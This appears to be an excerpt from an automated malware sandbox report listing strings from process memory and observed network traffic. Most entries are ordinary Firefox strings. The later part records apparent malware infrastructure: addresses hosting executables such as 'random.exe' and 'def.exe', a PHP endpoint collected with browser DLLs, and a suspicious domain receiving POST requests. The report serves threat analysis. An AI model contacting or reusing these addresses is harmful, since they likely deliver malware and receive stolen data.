Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Firefox is thinking about how to make this page better for you. Which best describes what you'd like to see in the Recommended by Pocket section:https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/It looks like you are passing several store enhancers to createStore(). This is not supported. Instead, compose them together to a single functionhttps://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", 
"*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: devtools-commandkey-profiler-start-stopNo callback set for this channel.^(?<url>\w+:.+):(?<line>\d+):(?<column>\d+)$devtools/client/framework/devtoolsbrowser and that URL. Falling back to and deploy previews URLs are allowed.Failed to listen. Listener already attached.devtools.performance.popup.feature-flagGot invalid request to save JSON dataFailed to execute WebChannel callback:WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_wordsbrowser.urlbar.dnsResolveFullyQualifiedNamesdevtools-commandkey-profiler-capturedevtools.debugger.features.javascript-tracingdevtools-commandkey-javascript-tracing-toggledevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js@mozilla.org/dom/slow-script-debug;1resource://devtools/shared/security/socket.jsDevTools telemetry entry point failed: @mozilla.org/network/protocol;1?name=default@mozilla.org/network/protocol;1?name=file@mozilla.org/uriloader/handler-service;1DevToolsStartup.jsm:handleDebuggerFlagdevtools.performance.recording.ui-base-urlresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/FileUtils.sys.mjsisDownloadsImprovementsAlreadyMigratedresource://gre/modules/NetUtil.sys.mjsgecko.handlerService.defaultHandlersVersionCan't invoke URIFixup in the content processresource://gre/modules/JSONFile.sys.mjs^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?{33d75835-722f-42c0-89cc-44f328e56a86}^([a-z+.-]+:\/{0,3})*([^\/@]+@).+get FIXUP_FLAGS_MAKE_ALTERNATE_URIget FIXUP_FLAG_FORCE_ALTERNATE_URIresource://gre/modules/FileUtils.sys.mjs_injectDefaultProtocolHandlersIfNeededhttp://www.inbox.lv/rfc2368/?value=%shttps://mail.inbox.lv/compose?to=%shttp://poczta.interia.pl/mh/?mailto=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)get 
FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPScheme should be either http or httpshandlerSvc fillHandlerInfo: don't know this type@mozilla.org/uriloader/local-handler-app;1{c6cf88b7-452e-47eb-bdc9-86e3561648ef}extractScheme/fixupChangedProtocol<browser.fixup.domainsuffixwhitelist.http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttps://mail.yahoo.co.jp/compose/?To=%shttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/web-handler-app;1@mozilla.org/uriloader/dbus-handler-app;1resource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/JSONFile.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1SEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLFirst argument should be an nsIInputStreamresource://gre/modules/ExtHandlerService.sys.mjsNon-zero amount of bytes must be specified@mozilla.org/network/file-input-stream;1resource://gre/modules/URIFixup.sys.mjsnewChannel requires a single object argument@mozilla.org/network/async-stream-copier;1_finalizeInternal/this._finalizePromise<@mozilla.org/scriptableinputstream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%shttps://m
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000003.3207024753.00000132C41C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3302490357.00000132C2703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3279683763.00000132BB544000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3304363170.00000132C3C88000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6AE2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3287630311.00000132BD1C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3249141559.00000132B6A03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/addons/XPIProvider.jsm*://cdn.branch.io/branch-latest.min.js**://pub.doubleverify.com/signals/pub.js**://static.criteo.net/js/ld/publishertag.js*://www.google-analytics.com/gtm/js*FileUtils_closeSafeFileOutputStream*://s0.2mdn.net/instream/html5/ima3.js*://auth.9c9media.ca/auth/main.js*://connect.facebook.net/*/all.js**://www.google-analytics.com/plugins/ua/ec.js*://www.googletagservices.com/tag/js/gpt.js**://c.amazon-adsystem.com/aax2/apstag.js*://static.chartbeat.com/js/chartbeat.js*://imasdk.googleapis.com/js/sdkloader/ima3.js*://*.imgur.io/js/vendor.*.bundle.js*://www.rva311.com/static/js/main.*.chunk.jsFileUtils_closeAtomicFileOutputStreamwebcompat-reporter%40mozilla.org:1.5.1*://web-assets.toggl.com/app/assets/scripts/*.js*://*.imgur.com/js/vendor.*.bundle.jshttps://smartblock.firefox.etp/play.svg*://track.adform.net/serving/scripts/trackpoint/*://www.everestjs.net/static/st.v3.js**://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svg*://libs.coremetrics.com/eluminate.js*://connect.facebook.net/*/sdk.js**://www.google-analytics.com/analytics.js**://www.googletagmanager.com/gtm.js**://ssl.google-analytics.com/ga.jswebcompat-reporter@mozilla.org.xpi{5874af6d-5719-4e1b-b155-ef4eae7fcb32} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB450000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000023.00000003.3207024753.00000132C4166000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3311278425.00000132C4166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000023.00000002.3276641087.00000132BB424000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3276641087.00000132BB46A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3267365896.00000132BB0E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic DNS traffic detected: DNS query: mdec.nelreports.net
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: feb3d39b6a.exe, 00000013.00000003.3279806734.0000000000F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: feb3d39b6a.exe, 00000013.00000003.3279806734.0000000000F67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/$
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: file.exe, 00000000.00000002.2604363979.0000000000F44000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exeZ
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280263436.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F63000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3325496856.000000000098B000.00000004.00000010.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F95000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3278865021.0000000000F77000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez.
Source: feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exez1
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe4
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe6
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000003.3280395469.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, feb3d39b6a.exe, 00000013.00000002.3327603670.0000000000F03000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: feb3d39b6a.exe, 00000013.00000003.3270730206.0000000000F86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2604363979.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp, 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dllL
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll;
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dll8
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllj
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllv
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllB
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/Local
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php#
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/Fu
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php?
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpC
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.0000000000847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpHJA
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpL
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpUser
Source: file.exe, 00000000.00000002.2593553859.0000000000264000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: file.exe, 00000000.00000002.2614456358.000000000B7C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpc
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpd
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfox
Source: file.exe, 00000000.00000002.2604363979.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpgPreference.Verb
Source: 815f2a8fe8.exe, 00000014.00000002.3062536575.00000000007EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/t
Source: file.exe, 00000000.00000002.2604363979.0000000000F57000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/x
Source: file.exe, 00000000.00000002.2593553859.0000000000347000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.phpedf1eb2b06d47fdacce46c03289d-release
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/D
Source: skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000011.00000002.3331222029.00000000016C0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php5001
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpP
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phph
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phps
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpta
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ons
Source: skotes.exe, 00000011.00000002.3331222029.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/ta
Source: skotes.exe, 00000011.00000002.3331222029.0000000001628000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000011.00000002.3331222029.000000000163D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exea
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/referenceBranch
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/schemaVersion
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/showPreferencesEntrypoint
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/slug
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingDescription
Source: firefox.exe, 00000023.00000002.3270548472.00000132BB317000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/userFacingName
